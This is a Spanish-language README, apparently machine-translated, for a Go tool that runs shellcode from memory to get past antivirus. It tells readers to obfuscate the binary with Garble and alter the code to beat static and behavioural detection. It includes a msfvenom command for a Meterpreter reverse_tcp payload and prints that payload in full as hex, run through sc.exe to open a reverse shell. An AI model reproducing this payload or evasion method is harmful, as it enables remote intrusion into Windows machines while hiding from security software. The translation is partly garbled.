Este es un programa para ejecutar ShellCode como su propio proceso, todo de la memoria. Esto fue escrito para derrotar a la detección antivirus. Esto ahora se está detectando como Virtool: Win32/Shrine.A. Use una herramienta como Garble para ofuscar al binario para derrotar el análisis estático. Cambie el código usted mismo para derrotar el análisis de comportamiento.
Tenga en cuenta que solo se ejecutará el código de shell de 64 bits en un proceso de 64 bits. Esto no puede autodetectar su arquitectura de SHellCode.
Use MSFVENOM o MetaSploit para generar un poco de shellcode como formato hexagonal:
$ msfvenom -p windows/meterpreter/reverse_tcp -f hex -o rev.hex LHOST=127.0.0.1 LPORT=4444
c:windowstemp>sc.exe fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c77260789e8ffd0b89001000029c454506829806b00ffd56a0a687f000001680200115c89e6505050504050405068ea0fdfe0ffd5976a1056576899a57461ffd585c0740aff4e0875ece8670000006a006a0456576802d9c85fffd583f8007e368b366a406800100000566a006858a453e5ffd593536a005653576802d9c85fffd583f8007d285868004000006a0050680b2f0f30ffd55768756e4d61ffd55e5eff0c240f8570ffffffe99bffffff01c329c675c1c3bbf0b5a2566a0053ffd5
A veces, el código de shell es mayor que el límite de una línea de comando con argumentos. Intente poner todo en un script por lotes en su lugar.
Pasos estándar de construcción de Go Go. Coloque los goos en windows y Goarch a lo mismo que su código de shell, ya sea 386 o amd64 . Esto no puede detectar la arquitectura de su código de shell.
El binario resultante es un poco grande, 2.1m, pero se comprime bien con Upx, aproximadamente 508k.